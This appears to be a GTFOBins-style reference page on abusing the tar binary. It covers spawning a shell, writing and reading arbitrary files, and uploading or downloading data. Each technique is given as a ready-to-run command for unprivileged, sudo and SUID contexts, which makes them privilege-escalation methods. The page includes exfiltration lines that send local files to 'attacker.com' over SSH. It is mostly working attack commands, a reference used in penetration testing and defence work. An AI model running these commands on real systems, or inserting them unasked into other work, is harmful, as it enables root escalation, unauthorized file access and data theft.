.. / tar

Sponsor Fork Star

• Shell
• File write
• File read
• Upload
• Download

Shell

This executable can spawn an interactive system shell.

• Unprivileged

  This function can be performed by any unprivileged user.

  tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  Remarks

  This executable runs commands using the system shell, e.g., via functions like system, so it only works for distributions where the shell does not drop SUID privileges.

  tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

• Version requirements

  GNU

  Unprivileged

  This function can be performed by any unprivileged user.

  tar xf /dev/null -I '/bin/sh -c "/bin/sh 0<&2 1>&2"'

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  tar xf /dev/null -I '/bin/sh -c "/bin/sh 0<&2 1>&2"'

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  Remarks

  This executable runs commands directly, e.g., via functions like exec, remember to omit the -p argument of every /bin/sh invocation for distributions where the default shell does not drop SUID privileges.

  tar xf /dev/null -I '/bin/sh -c "/bin/sh 0<&2 1>&2"'

• Version requirements

  GNU

  Comment

  The archive can also be prepared offline then uploaded to the target.

  Unprivileged

  This function can be performed by any unprivileged user.

  echo '/bin/sh 0<&1' >/path/to/temp-file
  tar cf /path/to/temp-file.tar /path/to/temp-file
  tar xf /path/to/temp-file.tar --to-command /bin/sh

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  echo '/bin/sh 0<&1' >/path/to/temp-file
  tar cf /path/to/temp-file.tar /path/to/temp-file
  tar xf /path/to/temp-file.tar --to-command /bin/sh

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  echo '/bin/sh 0<&1' >/path/to/temp-file
  tar cf /path/to/temp-file.tar /path/to/temp-file
  tar xf /path/to/temp-file.tar --to-command /bin/sh

File write

This executable can write data to local files.

• Version requirements

  GNU

  Comment

  The archive can also be prepared offline then uploaded to the target.

  Unprivileged

  This function can be performed by any unprivileged user.

  echo DATA >/path/to/temp-file
  tar cf /path/to/temp-file.tar /path/to/temp-file
  tar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  echo DATA >/path/to/temp-file
  tar cf /path/to/temp-file.tar /path/to/temp-file
  tar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  echo DATA >/path/to/temp-file
  tar cf /path/to/temp-file.tar /path/to/temp-file
  tar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@

File read

This executable can read data from local files.

• Version requirements

  GNU

  Comment

  The file is read then passed to the specified command (e.g., tar xO) via standard input.

  Unprivileged

  This function can be performed by any unprivileged user.

  tar cf /dev/stdout /path/to/input-file -I 'tar xO'

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  tar cf /dev/stdout /path/to/input-file -I 'tar xO'

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  tar cf /dev/stdout /path/to/input-file -I 'tar xO'

Upload

This executable can upload local data.

• Version requirements

  GNU

  Comment

  The attacker box must have the rmt utility installed.

  Unprivileged

  This function can be performed by any unprivileged user.

  tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh

  Receiver

  An SSH server can be used on the attacker box to receive the data.

Download

This executable can download remote data.

• Version requirements

  GNU

  Comment

  The attacker box must have the rmt utility installed.

  Unprivileged

  This function can be performed by any unprivileged user.

  tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh

  Sender

  An SSH server can be used on the attacker box to send the data.

Source | History